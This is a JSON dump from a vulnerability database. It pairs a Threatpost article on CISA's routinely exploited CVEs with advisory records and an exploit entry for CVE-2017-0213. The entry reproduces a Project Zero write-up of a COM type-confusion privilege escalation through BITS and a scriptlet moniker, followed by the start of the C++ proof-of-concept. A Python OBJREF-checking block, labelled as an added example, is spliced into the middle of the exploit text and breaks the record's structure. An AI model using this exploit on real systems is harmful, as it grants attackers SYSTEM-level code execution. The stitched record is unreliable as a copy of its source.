"id": "THREATPOST:3649750E149C0B00551806E47C047B39", "href": "https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-30T09:53:38", "description": "In a perfect world, CISA would laminate cards with the year\u2019s top 30 vulnerabilities: You could whip it out and ask a business if they\u2019ve bandaged these specific wounds before you hand over your cash.\n\nThis is not a perfect world. 
There are no laminated vulnerability cards.\n\nBut at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Center, and the UK\u2019s National Cyber Security Center listed the vulnerabilities that were \u201croutinely\u201d exploited in 2020, as well as those that are most often being picked apart so far this year.\n\nThe vulnerabilities \u2013 which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian \u2013 include publicly known bugs, some of which are growing hair. One, in fact, dates to 2000.\n\n\u201cCyber actors continue to exploit publicly known \u2013 and often dated \u2013 software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\u201d according to the advisory. \u201cHowever, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\u201d\n\nSo far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.\n\nAll of the vulnerabilities have received patches from vendors. 
That doesn\u2019t mean those patches have been applied, of course.\n\n## Repent, O Ye Patch Sinners\n\nAccording to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.\n\nWhy would they stop? As long as systems remain unpatched, it\u2019s a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.\n\n> Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. \u2014Advisory\n\nIn fact, the top four preyed-upon 2020 vulnerabilities were discovered between 2018 and 2020, showing how common it is for organizations using the devices or technology in question to sidestep patching or remediation.\n\nThe top four:\n\n * [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>), a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. As of December 2020, 17 percent \u2013 about one in six of the 80,000 companies affected \u2013 hadn\u2019t patched.\n * [CVE-2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. 
In April 2020, the Department of Homeland Security (DHS) urged users to change their passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts, given that the patches were deployed too late to stop bad actors from compromising those accounts.\n * [CVE-2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was actively being exploited as of a few months ago, in April 2021.\n * [CVE-2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical vulnerability in F5 Networks\u2019 BIG-IP application delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware and more.\n\nThe cybersecurity bodies urged organizations to remediate or mitigate vulnerabilities as soon as possible to reduce their risk of being ripped up. 
For those that can\u2019t do that, the advisory encouraged organizations to check for the presence of indicators of compromise (IOCs).\n\nIf IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.\n\n## 2020 Top 12 Exploited Vulnerabilities\n\nHere\u2019s the full list of the top dozen exploited bugs from last year:\n\n**Vendor** | **CVE** | **Type** \n---|---|--- \nCitrix | CVE-2019-19781 | arbitrary code execution \nPulse Secure | CVE-2019-11510 | arbitrary file reading \nFortinet | CVE-2018-13379 | path traversal \nF5 BIG-IP | CVE-2020-5902 | remote code execution (RCE) \nMobileIron | CVE-2020-15505 | RCE \nMicrosoft | CVE-2017-11882 | RCE \nAtlassian | CVE-2019-11580 | RCE \nDrupal | CVE-2018-7600 | RCE \nTelerik | CVE-2019-18935 | RCE \nMicrosoft | CVE-2019-0604 | RCE \nMicrosoft | CVE-2020-0787 | elevation of privilege \nMicrosoft (Netlogon) | CVE-2020-1472 | elevation of privilege \n \n## Most Exploited So Far in 2021\n\nCISA et al. also listed these 13 flaws, all discovered this year, that are also being energetically exploited:\n\n * Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065: four flaws that can be chained together in the ProxyLogon group of security bugs that led to a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: as of March, Microsoft said that 92 percent of Exchange Servers were vulnerable to [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n * Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. 
defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.\n * Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These ones led to scads of attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).\n * VMware: CVE-2021-21985: A [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in VMware\u2019s virtualization management platform, vCenter Server, that allows a remote attacker to exploit the product and take control of a company\u2019s affected system.\n\nThe advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they\u2019re vulnerable or have already been compromised. 
The advisory also offers guidance for locking down systems.\n\n## Can Security Teams Keep Up?\n\nRick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an \u201cinfluential tool to help teams stay above water and minimize their attack surface.\u201d\n\nThe CVEs highlighted in Wednesday\u2019s alert \u201ccontinue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,\u201d he told Threatpost on Thursday.\n\nRecent research ([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber has found that more than three-quarters of cybersecurity leaders have been impacted by a security vulnerability over the past year. It raises the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?\n\nYaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it\u2019s become ever more vital for enterprise IT security stakeholders to make \u201cmeaningful changes to their cyber hygiene efforts.\u201d That means \u201cprioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.\u201d\n\nGranted, vulnerability management is \u201cone of the most difficult aspects of any security program,\u201d he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Bar-Dayan said. 
\u201cTaking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.\u201d\n\n072921 15:02 UPDATE: Corrected misattribution of quotes.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T18:39:56", "type": "threatpost", "title": "CISA\u2019s Top 30 Bugs: One\u2019s Old Enough to Buy Beer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 
10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", "CVE-2019-19781", "CVE-2020-0787", "CVE-2020-1472", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T18:39:56", "id": "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "href": "https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T15:46:56", "description": "An elevation of privilege exists in Windows COM Aggregate Marshaler. The vulnerability is due to improper handling of certain objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows COM Elevation of Privilege (CVE-2017-0213)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2017-05-09T00:00:00", "id": "CPAI-2017-0379", "href": "", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-02-22T23:28:34", "description": "A privilege escalation exists in Microsoft Windows Background Intelligent Transfer Service. Successful exploitation of this vulnerability would allow a local attacker to gain elevated privileges on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Background Intelligent Transfer Service Privilege Escalation (CVE-2020-0787)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2022-02-22T00:00:00", "id": "CPAI-2020-3458", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-21T15:35:29", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "zdt", "title": "Microsoft Windows - COM Aggregate 
Marshaler/IRemUnknown2 Type Confusion Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2017-05-17T00:00:00", "id": "1337DAY-ID-27798", "href": "https://0day.today/exploit/description/27798", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1107\r\n \r\nWindows: COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\nWhen accessing an OOP COM object using IRemUnknown2 the local unmarshaled proxy can be for a different interface to that requested by QueryInterface resulting in a type confusion which can result in EoP.\r\n \r\nDescription:\r\n \r\nQuerying for an IID on an OOP (or remote) COM object calls the ORPC method RemQueryInterface or RemQueryInterface2 on the default proxy. This request is passed to the remote object which queries the implementation object and if successful returns a marshaled representation of that interface to the caller. \r\n \r\nThe difference between RemQueryInterface and RemQueryInterface2 (RQI2) is how the objects are passed back to the caller. For RemQueryInterface the interface is passed back as a STDOBJREF which only contains the basic OXID/OID/IPID information to connect back. RemQueryInterface2 on the other hand passes back MInterfacePointer structures, each of which is an entire OBJREF. The rationale, as far as I can tell, is that RQI2 is used for implementing in-process handlers, some interfaces can be marshaled using the standard marshaler and others can be custom marshaled. This is exposed through the Aggregate Standard Marshaler. \r\n \r\nThe bug lies in the implementation of unpacking the results of the RQI2 request in CStdMarshal::Finish_RemQIAndUnmarshal2. For each MInterfacePointer CStdMarshal::UnmarshalInterface is called passing the IID of the expected interface and the binary data wrapped in an IStream. 
CStdMarshal::UnmarshalInterface blindly unmarshals the interface, which creates a local proxy object but the proxy is created for the IID in the OBJREF stream and NOT the IID requested in RQI2. No further verification occurs at this point and the created proxy is passed back up the call stack until it is received by the caller (through a void** obviously). \r\n \r\nIf the IID in the OBJREF doesn\u2019t match the IID requested the caller doesn\u2019t know; if it calls any methods on the expected interface it will be calling a type confused object. This could result in crashes in the caller when it tries to access methods on the expected interface which aren\u2019t there or are implemented differently. You could probably also return a standard OBJREF to an object local to the caller, this will result in returning the local object itself which might have more scope for exploiting the type confusion. In order to get the caller to use RQI2 we just need to pass it back an object which is custom marshaled with the Aggregate Standard Marshaler. This will set a flag on the marshaler which indicates to always use the aggregate marshaler which results in using RQI2 instead of RQI. As this class is a core component of COM it\u2019s trusted and so isn\u2019t affected by the EOAC_NO_CUSTOM_MARSHAL setting.\r\n \r\nIn order to exploit this a different caller needs to call QueryInterface on an object under a less trusted user's control. This could be a more privileged user (such as a sandbox broker), or a privileged service. This is a pretty easy pattern to find: any method in an exposed interface on a more trusted COM object which takes an interface pointer or variant would potentially be vulnerable. For example IPersistStream takes an IStream interface pointer and will call methods on it. Another type of method is one of the various notification interfaces such as IBackgroundCopyCallback for BITS. 
This can probably also be used remotely if the attacker has the opportunity to inject an OBJREF stream into a connection which is set to CONNECT level security (which seems to be the default activation security). \r\n \r\nOn to exploitation, as you well know I\u2019ve little interest in exploiting memory corruptions, especially as this would either trigger CFG on modern systems or require a very precise lineup of expected method and actual called method which could be tricky to exploit reliably. However, I think that at least for escaping a sandbox it might be your only option. So I\u2019m not going to do that; instead I\u2019m going to exploit it logically. The only problem is that this is probably unexploitable from a sandbox (maybe) and requires a very specific type of callback into our object. \r\n \r\nThe thing I\u2019m going to exploit is in the handling of OLE Automation auto-proxy creation from type libraries. When you implement an Automation compatible object you could implement an explicit proxy but if you\u2019ve already got a Type library built from your IDL then OLEAUT32 provides an alternative. If you register your interface with a Proxy CLSID for PSOAInterface or PSDispatch then instead of loading your PS DLL it will load OLEAUT32. The proxy loader code will look up the interface entry for the passed IID to see if there\u2019s a registered type library associated with it. If there is the code will call LoadTypeLib on that library and look up the interface entry in the type library. It will then construct a custom proxy object based on the type library information. 
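The unmarshal path described above builds a local proxy for whatever IID the OBJREF stream happens to carry, without comparing it to the IID passed to RemQueryInterface2. The following is an added example written for this page, not code from the Project Zero PoC below and not the COM runtime's own implementation: a Python parser for the fixed OBJREF header (signature, flags, IID, and the unmarshal CLSID for OBJREF_CUSTOM) with the IID-consistency check that Finish_RemQIAndUnmarshal2 was missing. IID_ITMediaControl and CLSID_AggStdMarshal2 are copied from the PoC source below, IID_IPersist is the well-known value, and the OXID/OID/IPID and custom payload used in demo() are constructed placeholders, not captured from a real connection.

```python
"""Minimal OBJREF parser plus the IID-vs-request check absent in CVE-2017-0213.
Added example for this page; not the PoC's code nor the COM runtime's."""
import struct
import uuid
from dataclasses import dataclass
from typing import Optional

# OBJREF header constants (MS-DCOM 2.2.18): "MEOW" signature and flags values.
OBJREF_SIGNATURE = b"MEOW"
OBJREF_STANDARD, OBJREF_HANDLER, OBJREF_CUSTOM, OBJREF_EXTENDED = 0x1, 0x2, 0x4, 0x8

IID_IPERSIST = uuid.UUID("0000010c-0000-0000-c000-000000000046")  # well-known IID
# IID the page's PoC swaps in, and the aggregate standard marshaler CLSID its
# GetUnmarshalClass returns (both copied from the PoC source on this page).
IID_ITMEDIACONTROL = uuid.UUID("c445dde8-5199-4bc7-9807-5ffb92e42e09")
CLSID_AGGSTDMARSHAL2 = uuid.UUID("00000027-0000-0008-c000-000000000046")


class ObjrefError(ValueError):
    """Malformed or truncated OBJREF."""


class IIDMismatch(ObjrefError):
    """OBJREF carries a different IID than the one requested via RQI2."""


@dataclass
class Objref:
    flags: int
    iid: uuid.UUID
    clsid: Optional[uuid.UUID]   # unmarshal class, present for OBJREF_CUSTOM only
    body: bytes                  # type-specific remainder, not interpreted further


def parse_objref(stream: bytes) -> Objref:
    """Parse signature, flags and IID; check the fixed STDOBJREF size for
    OBJREF_STANDARD; pull CLSID and pObjectData out of OBJREF_CUSTOM."""
    if len(stream) < 24:
        raise ObjrefError("OBJREF shorter than its 24-byte header")
    sig, flags = struct.unpack_from("<4sI", stream, 0)
    if sig != OBJREF_SIGNATURE:
        raise ObjrefError("bad OBJREF signature %r" % sig)
    iid = uuid.UUID(bytes_le=stream[8:24])   # GUIDs are little-endian on the wire
    body = stream[24:]
    clsid = None
    if flags == OBJREF_STANDARD:
        if len(body) < 40:   # STDOBJREF: flags, cPublicRefs, oxid, oid, ipid
            raise ObjrefError("STDOBJREF truncated")
    elif flags == OBJREF_CUSTOM:
        if len(body) < 24:   # clsid(16) + cbExtension(4) + size(4)
            raise ObjrefError("OBJREF_CUSTOM truncated")
        clsid = uuid.UUID(bytes_le=body[:16])
        _cb_extension, size = struct.unpack_from("<II", body, 16)
        body = body[24:24 + size]
        if len(body) != size:
            raise ObjrefError("OBJREF_CUSTOM pObjectData truncated")
    elif flags not in (OBJREF_HANDLER, OBJREF_EXTENDED):
        raise ObjrefError("unknown OBJREF flags 0x%x" % flags)
    return Objref(flags, iid, clsid, body)


def unmarshal_checked(stream: bytes, requested_iid: uuid.UUID) -> Objref:
    """The missing check: refuse an OBJREF whose IID is not the IID that was
    passed to RemQueryInterface2, rather than building a proxy for whatever
    interface the untrusted remote side chose to put in the stream."""
    ref = parse_objref(stream)
    if ref.iid != requested_iid:
        raise IIDMismatch("requested %s, OBJREF carries %s" % (requested_iid, ref.iid))
    return ref


def build_standard_objref(iid: uuid.UUID, oxid: int, oid: int, ipid: uuid.UUID) -> bytes:
    """Constructed test input: OBJREF_STANDARD with an empty DUALSTRINGARRAY."""
    stdobjref = struct.pack("<IIQQ", 0, 1, oxid, oid) + ipid.bytes_le
    dual_string_array = struct.pack("<HH", 0, 0)   # wNumEntries, wSecurityOffset
    return OBJREF_SIGNATURE + struct.pack("<I", OBJREF_STANDARD) + iid.bytes_le + stdobjref + dual_string_array


def build_custom_objref(iid: uuid.UUID, clsid: uuid.UUID, payload: bytes) -> bytes:
    """Constructed test input: OBJREF_CUSTOM naming an unmarshal CLSID, as the
    PoC's CMarshaller does through GetUnmarshalClass. Payload is a placeholder."""
    return (OBJREF_SIGNATURE + struct.pack("<I", OBJREF_CUSTOM) + iid.bytes_le
            + clsid.bytes_le + struct.pack("<II", 0, len(payload)) + payload)


def demo() -> dict:
    """An honest reply versus the PoC's swapped-IID reply to a request for IPersist."""
    ipid = uuid.UUID(int=0x1234)   # constructed, not a real IPID
    honest = build_standard_objref(IID_IPERSIST, 0x11, 0x22, ipid)
    swapped = build_custom_objref(IID_ITMEDIACONTROL, CLSID_AGGSTDMARSHAL2, b"\x00" * 8)
    results = {"honest_ok": unmarshal_checked(honest, IID_IPERSIST).iid == IID_IPERSIST}
    try:
        unmarshal_checked(swapped, IID_IPERSIST)
        results["swapped_rejected"] = False
    except IIDMismatch:
        results["swapped_rejected"] = True
    results["swapped_clsid_is_aggstdmarshal"] = parse_objref(swapped).clsid == CLSID_AGGSTDMARSHAL2
    return results


if __name__ == "__main__":
    print(demo())
```

The check models the first of the two remediations the PoC author lists under "Expected Result" (refuse to unmarshal on an IID mismatch); the alternative, QueryInterface on the local proxy for the requested IID, would happen after unmarshaling and is not modelled here. Only the header and the OBJREF_CUSTOM envelope are parsed; STDOBJREF fields and DUALSTRINGARRAY bindings are left opaque.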
\r\n \r\nThe trick here is while in general we don\u2019t control the location of the type library (so it\u2019s probably in a location we can\u2019t write to such as system32) if we can get an object unmarshaled which indicates its IID is one of these auto-proxy interfaces while the privileged service is impersonating us we can redirect the C: drive to anywhere we like and so get the service to load an arbitrary type library file instead of the system one. One easy place where this exact scenario occurs is in the aforementioned BITS SetNotifyInterface function. The service first impersonates the caller before calling QI on the notify interface. We can then return an OBJREF for an automation IID even though the service asked for a BITS callback interface.\r\n \r\nSo what? Well it\u2019s been known for almost 10 years that the Type library file format is completely unsafe. It was reported and it wasn\u2019t changed; Tombkeeper highlighted this in his \u201cSexrets [sic] of LoadLibrary\u201d presentation at CSW 2015. You can craft a TLB which will directly control EIP. Now you\u2019d assume therefore I\u2019m trading an unreliable way of getting EIP control for one which is much easier, if you assume that you\u2019d be wrong. Instead I\u2019m going to abuse the fact that TLBs can have referenced type libraries, which is used instead of embedding the type definitions inside the TLB itself. When a reference type is loaded the loader will try and look up the TLB by its GUID, if that fails it will take the filename string and pass it verbatim to LoadTypeLib. It\u2019s a lesser-known fact that this function, if it fails to find a file with the correct name will try and parse the name as a moniker. 
Therefore we can insert a scriptlet moniker into the type library: when the auto-proxy generator tries to find how many functions the interface implements it walks the inheritance chain, which causes the referenced TLB to be loaded, which causes a scriptlet moniker to be loaded and bound which results in arbitrary execution in a scripting language inside the privileged COM caller. \r\n \r\nThe need to replace the C: drive is why this won\u2019t work as a sandbox escape. Also it's a more general technique, not specific to this vulnerability as such; you could exploit it in the low-level NDR marshaler layer, however it\u2019s rare to find something impersonating the caller during the low-level unmarshal. Type libraries are not loaded using the flag added after CVE-2015-1644 which prevents DLLs being loaded from the impersonate device map. I think you might want to fix this as well as there are other places and scenarios this can occur, for example there\u2019s a number of WMI services (such as anything which touches GPOs) which result in the ActiveDS com object being created, this is automation compatible and so will load a type library while impersonating the caller. Perhaps the auto-proxy generator should temporarily disable impersonation when loading the type library to prevent this happening. \r\n \r\nProof of Concept:\r\n \r\nI\u2019ve provided a PoC as a C++ source code file. You need to compile it first. It abuses the BITS SetNotifyInterface to get a type library loaded under impersonation. We cause it to load a type library which references a scriptlet moniker which gets us code execution inside the BITS service.\r\n \r\n1) Compile the C++ source code file.\r\n2) Execute the PoC from a directory writable by the current user. 
\r\n3) An admin command running as local system should appear on the current desktop.\r\n \r\nExpected Result:\r\nThe caller should realize there\u2019s an IID mismatch and refuse to unmarshal, or at least QI the local proxy for the correct interface.\r\n \r\nObserved Result:\r\nThe wrong proxy is created to that requested resulting in type confusion and an automation proxy being created resulting in code execution in the BITS server.\r\n*/\r\n \r\n// BITSTest.cpp : Defines the entry point for the console application.\r\n//\r\n#include <bits.h>\r\n#include <bits4_0.h>\r\n#include <stdio.h>\r\n#include <tchar.h>\r\n#include <lm.h>\r\n#include <string>\r\n#include <comdef.h>\r\n#include <winternl.h>\r\n#include <Shlwapi.h>\r\n#include <strsafe.h>\r\n#include <vector>\r\n \r\n#pragma comment(lib, \"shlwapi.lib\")\r\n \r\nstatic bstr_t IIDToBSTR(REFIID riid)\r\n{\r\n LPOLESTR str;\r\n bstr_t ret = \"Unknown\";\r\n if (SUCCEEDED(StringFromIID(riid, &str)))\r\n {\r\n ret = str;\r\n CoTaskMemFree(str);\r\n }\r\n return ret;\r\n}\r\n \r\nGUID CLSID_AggStdMarshal2 = { 0x00000027,0x0000,0x0008,{ 0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 } };\r\nGUID IID_ITMediaControl = { 0xc445dde8,0x5199,0x4bc7,{ 0x98,0x07,0x5f,0xfb,0x92,0xe4,0x2e,0x09 } };\r\n \r\nclass CMarshaller : public IMarshal\r\n{\r\n LONG _ref_count;\r\n IUnknownPtr _unk;\r\n \r\n ~CMarshaller() {}\r\n \r\npublic:\r\n \r\n CMarshaller(IUnknown* unk) : _ref_count(1)\r\n {\r\n _unk = unk;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE QueryInterface(\r\n /* [in] */ REFIID riid,\r\n /* [iid_is][out] */ _COM_Outptr_ void __RPC_FAR *__RPC_FAR *ppvObject)\r\n {\r\n *ppvObject = nullptr;\r\n printf(\"QI - Marshaller: %ls %p\\n\", IIDToBSTR(riid).GetBSTR(), this);\r\n \r\n if (riid == IID_IUnknown)\r\n {\r\n *ppvObject = this;\r\n }\r\n else if (riid == IID_IMarshal)\r\n {\r\n *ppvObject = static_cast<IMarshal*>(this);\r\n }\r\n else\r\n {\r\n return E_NOINTERFACE;\r\n }\r\n printf(\"Queried Success: %p\\n\", 
*ppvObject);\r\n ((IUnknown*)*ppvObject)->AddRef();\r\n return S_OK;\r\n }\r\n \r\n virtual ULONG STDMETHODCALLTYPE AddRef(void)\r\n {\r\n printf(\"AddRef: %d\\n\", _ref_count);\r\n return InterlockedIncrement(&_ref_count);\r\n }\r\n \r\n virtual ULONG STDMETHODCALLTYPE Release(void)\r\n {\r\n printf(\"Release: %d\\n\", _ref_count);\r\n ULONG ret = InterlockedDecrement(&_ref_count);\r\n if (ret == 0)\r\n {\r\n printf(\"Release object %p\\n\", this);\r\n delete this;\r\n }\r\n return ret;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE GetUnmarshalClass(\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][unique][in] */\r\n _In_opt_ void *pv,\r\n /* [annotation][in] */\r\n _In_ DWORD dwDestContext,\r\n /* [annotation][unique][in] */\r\n _Reserved_ void *pvDestContext,\r\n /* [annotation][in] */\r\n _In_ DWORD mshlflags,\r\n /* [annotation][out] */\r\n _Out_ CLSID *pCid)\r\n {\r\n *pCid = CLSID_AggStdMarshal2;\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE GetMarshalSizeMax(\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][unique][in] */\r\n _In_opt_ void *pv,\r\n /* [annotation][in] */\r\n _In_ DWORD dwDestContext,\r\n /* [annotation][unique][in] */\r\n _Reserved_ void *pvDestContext,\r\n /* [annotation][in] */\r\n _In_ DWORD mshlflags,\r\n /* [annotation][out] */\r\n _Out_ DWORD *pSize)\r\n {\r\n *pSize = 1024;\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE MarshalInterface(\r\n /* [annotation][unique][in] */\r\n _In_ IStream *pStm,\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][unique][in] */\r\n _In_opt_ void *pv,\r\n /* [annotation][in] */\r\n _In_ DWORD dwDestContext,\r\n /* [annotation][unique][in] */\r\n _Reserved_ void *pvDestContext,\r\n /* [annotation][in] */\r\n _In_ DWORD mshlflags)\r\n {\r\n printf(\"Marshal Interface: %ls\\n\", IIDToBSTR(riid).GetBSTR());\r\n IID iid = riid;\r\n if (iid == __uuidof(IBackgroundCopyCallback2) || iid == 
